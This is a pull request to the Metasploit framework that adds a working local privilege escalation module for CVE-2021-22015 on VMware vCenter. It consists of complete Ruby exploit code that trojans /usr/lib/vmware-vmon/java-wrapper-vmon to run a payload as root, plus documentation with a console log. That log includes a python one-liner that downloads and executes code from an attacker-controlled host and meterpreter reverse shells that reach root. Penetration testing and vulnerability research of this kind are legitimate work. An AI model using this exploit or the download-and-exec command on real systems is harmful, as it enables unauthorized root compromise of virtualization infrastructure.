### PR TITLE
CVE-2021-22015 vCenter priv esc

### DIFF
--- a/documentation/modules/exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc.md
@@ -1,0 +1,112 @@
+## Vulnerable Application
+
+This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
+`/usr/lib/vmware-vmon/java-wrapper-vmon` file. It is possible for anyone in the
+`cis` group to write to the file, which will execute as root on `vmware-vmon` service
+restart or host reboot.
+
+This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
+
+The following versions should be vulnerable:
+ - vCenter 7.0 before U2c
+ - vCenter 6.7 before U3o
+ - vCenter 6.5 before U3q
+
+## Verification Steps
+
+1. Start msfconsole
+2. Obtain a shell on vCenter for a user in the `cis` group.
+3. Do: `use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc`
+4. Do: `set session #`
+5. Do: `run`
+6. Restart the host, or the service (`systemctl restart vmware-vmon.service`) with a user who has permission
+7. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### VMware VirtualCenter 6.5.0 build-7070488
+
+Get initial shell (any vic group member will do, here we use vsphere-client)
+
+```
+[*] Processing java_wrapper.rb for ERB directives.
+resource (java_wrapper.rb)> use multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (java_wrapper.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (java_wrapper.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Using URL: http://2.2.2.2:8080/cFK3ylrNE9s
+[*] Server started.
+[*] Run the following command on the target machine:
+python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://2.2.2.2:8080/cFK3ylrNE9s', context=ssl._create_unverified_context());exec(r.read());"
+msf6 exploit(multi/script/web_delivery) > 
+[*] 1.1.1.1    web_delivery - Delivering Payload (432 bytes)
+[*] Sending stage (24380 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:59084) at 2022-11-20 10:45:06 -0500
+
+msf6 exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: vsphere-client
+meterpreter > sysinfo
+Computer        : localhost.ragedomain
+OS              : Linux 4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > shell
+Process 6710 created.
+Channel 1 created.
+vpxd -v
+/usr/sbin/vpxd: line 34: ulimit: open files: cannot modify limit: Operation not permitted
+sed: couldn't open temporary file /etc/vmware-vpx/sedXf9kV4: Permission denied
+VMware VirtualCenter 6.5.0 build-7070488
+^Z
+Background channel 1? [y/N]  y
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Conduct the priv esc
+
+```
+msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set session 1
+session => 1
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set verbose true
+verbose => true
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > jobs -K
+Stopping all jobs...
+
+[*] Server stopped.
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: python
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
+[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /root/.msf4/loot/20221120104723_default_1.1.1.1_javawrappervmo_605726.txt
+[*] Writing payload to /tmp/.BCOL6n
+[*] Writing '/tmp/.BCOL6n' (250 bytes) ...
+[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
+[*] Attempting to restart vmware-vmon service
+[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
+[*] Waiting 1800 seconds for shell
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 1.1.1.1
+[+] Deleted /tmp/.BCOL6n
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:32906) at 2022-11-20 10:47:52 -0500
+[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```

--- a/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb
+++ b/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb
@@ -129,5 +129,6 @@ class MetasploitModule < Msf::Exploit::Local
       print_status("Replacing trojaned #{java_wrapper_vmon} with original")
       write_file(java_wrapper_vmon, @backup)
     end
+    super
   end
 end

--- a/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb
+++ b/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter vScalation Priv Esc',
+        'Description' => %q{
+          This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
+          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the
+          cis group to write to the file, which will execute as root on vmware-vmon service
+          restart or host reboot.
+
+          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
+          The following versions should be vulnerable:
+          vCenter 7.0 before U2c
+          vCenter 6.7 before U3o
+          vCenter 6.5 before U3q
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Yuval Lazar' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],
+          [ 'CVE', '2021-22015' ],
+          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]
+        ],
+        'DisclosureDate' => '2021-09-21',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 1800 # 30min
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],
+          'AKA' => ['vScalation']
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def java_wrapper_vmon
+    '/usr/lib/vmware-vmon/java-wrapper-vmon'
+  end
+
+  def check
+    group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")
+    if writable?(java_wrapper_vmon) && group_owner == 'cis'
+      return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")
+    end
+
+    CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")
+  end
+
+  def exploit
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # backup the original file
+    @backup = read_file(java_wrapper_vmon)
+    path = store_loot(
+      'java-wrapper-vmon.text',
+      'text/plain',
+      rhost,
+      @backup,
+      'java-wrapper-vmon.text'
+    )
+    print_good("Original #{java_wrapper_vmon} backed up to #{path}")
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    print_status("Writing payload to #{payload_path}")
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup payload_path
+
+    # write trojaned file
+    # we want to write our payload towards the top to ensure it gets run
+    # writing it at the bottom of the file results in the payload not being run
+    print_status("Writing trojaned #{java_wrapper_vmon}")
+    write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))
+
+    # try to restart the service
+    print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')
+    service_restart = cmd_exec('systemctl restart vmware-vmon.service')
+    # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files
+    if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')
+      print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')
+    end
+    print_status("Waiting #{datastore['WfsDelay']} seconds for shell")
+  end
+
+  def cleanup
+    unless @backup.nil?
+      print_status("Replacing trojaned #{java_wrapper_vmon} with original")
+      write_file(java_wrapper_vmon, @backup)
+    end
+  end
+end


### PR DESCRIPTION
Fixes #16489

This PR adds a priv esc for users in the `cis` group to escalate to `root` on certain versions of vCenter.  A service file `/usr/lib/vmware-vmon/java-wrapper-vmon` has improper permissions allowing `cis` group members to write to it. Upon host reboot or `vmware-vmon` service restart, a root shell is obtained.

## Verification

1. Start msfconsole
2. Obtain a shell on vCenter for a user in the `cis` group. (I used `su vsphere-client` off an SSH session)
3. Do: `use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc`
4. Do: `set session #`
5. Do: `run`
6. Restart the host, or the service (`systemctl restart vmware-vmon.service`) with a user who has permission
7. You should get a root shell.